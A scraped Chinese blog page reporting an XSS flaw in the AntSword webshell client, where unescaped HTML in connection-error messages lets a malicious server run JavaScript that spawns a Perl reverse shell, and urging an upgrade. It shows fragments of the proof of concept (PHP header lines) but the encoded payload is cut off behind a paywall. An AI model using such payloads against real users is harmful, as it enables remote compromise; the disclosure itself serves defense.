蚁剑连接php3,中国蚁剑antSword RCE漏洞,建议所有用户升级

最新推荐文章于 2024-06-30 09:06:33 发布
最新推荐文章于 2024-06-30 09:06:33 发布
阅读量1k 收藏 2
点赞数
文章标签: 蚁剑连接php3
本文介绍了中国蚁剑AntSword的一个RCE漏洞,该漏洞源于XSS,允许攻击者通过未过滤的错误信息反弹shell。在用户连接webshell失败时,错误信息中的XSS漏洞可被利用,利用js调用perl代码反弹shell。蚁剑开发者已迅速发布新版本AntSword v2.0.7.1,修复了此问题并禁止了toastr输出html,建议所有用户升级到最新版以保障安全。
摘要由CSDN通过智能技术生成

4月12日凌晨,有用户在中国蚁剑GitHub上提交了issue,称发现中国蚁剑存在XSS漏洞,借此可引起RCE。据悉,该漏洞是因为在webshell远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。

当通过中国蚁剑连接webshell,出现连接失败情况时,中国蚁剑会返回错误信息,如下图:

6248a3e42a89615705efda5b8b2d04a4.png

而该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹攻击者的shell。

header('HTTP/1.1 500 #');

1

2

header('HTTP/1.1 500 #');

60d756d69c39af7e646490f1ed50014e.png

反弹shell的exp (for perl)如下,使用base64编码:

header("HTTP/1.1 406 Not #");

?&

最低0.47元/天 解锁文章
weixin_39935903
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2290
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
连接php3,xss漏洞,获取者shell
weixin_39654465的博客
03-10 1122
今日在github上看到暴露了一个xss漏洞,自己也经常使用。同时在freebuf上也有一篇文章,关于漏洞的。闲着没事测试了一波。一、漏洞成因shell远程连接失败时,会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。该信息并...
连接php3,利用中国蚁剑无文件连接 phpstudy 后门方法
weixin_39872872的博客
03-10 958
利用中国蚁剑无文件连接 phpstudy 后门方法0x01 描述Phpstudy 是一款 PHP 调试环境的程序集成包, 集成了最新的 Apache,PHP,phpMyAdmin,ZendOptimizer 等多款软件一次性安装, 无需配置, 即装即用. 由于其免费且方便的特性, 在国内有着近百万的 PHP 语言学习者, 开发者用户.后门名称: Phpstudy 后门威胁等级: 严重影响范围: P...
连接不成功解决方案
m0_73195494的博客
03-01 1278
如下图,使用连接时一直报错{"code":"ECONNRESET","error":"EONNRESET","syscall":"read"}
中国蚁剑中可能出现的问题
2201_75437983的博客
08-10 5266
(1)如果在最开始添加数据错误可能是在添加地址时的URL地址有两个http://它最开始就自带http://你可能没注意直接复制了网址就导致有两个http://。(3)这个连接失败情况可能是php代码出错,也可能是要关闭你的防火墙,关闭之后能ping通就是连接成功。(2)如果出现这种情况就是你的一句话木马php代码出错了。都没有成功最后是使用了这个。我跟着其他大佬使用过。这样能够连接成功了。
【无标题】连接时候报错两种解决方法亲测有效
2301_76815548的博客
03-18 1890
那就是wifi的问题,看看自己是否连接了公司的无线网或者是校园网,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性,就比如说放置一些安全设备,所以用自己的流量就可以解决了。
攻防世界Web “Web_php_unserialize、php_rce、Web_php_include”题解
qq_53325209的博客
04-06 2851
攻防世界高手进阶区 Web “Web_php_unserialize、php_rce、Web_php_include”题解。
负载均衡下的webshell连接+apachehttpd换行解析漏洞
m0_68390300的博客
02-09 306
负载均衡下上传webshell
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5611
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
关于AntSword)的溯源反制
Welcome To Myon'Blog !
12-30 1195
如果攻击者再次连接或者进入shell,则会报错,并且反弹一个shell给我们在1971端口上,我们可以利用该shell执行命令等,甚至溯源到对方的外网ip。如果我们发现了这个shell,我们该如何反击呢?以物理机为攻击机,虚拟机kali模拟受害者,之后使用kali进行溯源反制。最开始以为是系统问题,于是全换成Windows系统测试,依旧未成功。启用kali的Apache服务,用于模拟一个对外开放的服务。(我不清楚是否是我版本的问题还是什么问题)我这里使用的版本是2.1.15的(
[GXYCTF 2019]BabyUpload
wangzhemvp的博客
04-26 349
后端代码对文件类型 Content-type 有限制。但文件后缀为.jpg,不能连接。:解析.jpg文件中的php代码 ,内容为。传.htaccess文件失败,后发现。且后缀不能有 php。.htaccess文件。
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑
最新发布
m0_46745664的博客
06-30 1146
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑
中国蚁剑下载时,出现“无法成功完成操作,文件包含病毒或潜在的垃圾软件”报错的解决方案
m0_65514616的博客
02-07 1783
windows中国蚁剑下载时,出现“意外错误无法复制文件,文件包含病毒或潜在的垃圾软件”报错的解决方案,原因是代码中有部分文件被windows安全中心拦截,解决方法如下:
CVE-2020-0014 Toast组件点击事件截获漏洞
道阻且长,行则将至。
01-07 1512
漏洞可使恶意 App 通过构造一个可被点击的 Toast 视图来截获用户在屏幕上的操作,以达到搜集用户密码等敏感信息的目的。
toastr
Jiao543的博客
10-22 346
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> </head> <link href="https://cdn.bootcdn.net/ajax/libs/toastr.js/latest/css/toastr.min.css" rel="stylesheet"> <script src="https:
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
m0_73734159的博客
10-16 2106
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
2-1 学习内容
m0_51811529的博客
08-22 560
来自初学者的学习笔记
标题:客户端RCE挖掘分析:源码解析及高质量CVE探讨
文章讲述了作者在一次面试中受到面试官关于自己CVE质量不高的批评后,决定挖掘客户端的RCE漏洞的过程和源码分析。作者在挖掘客户端RCE漏洞时,发现了一个关于Electron开源库的安全问题,并通过结合Chromium...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值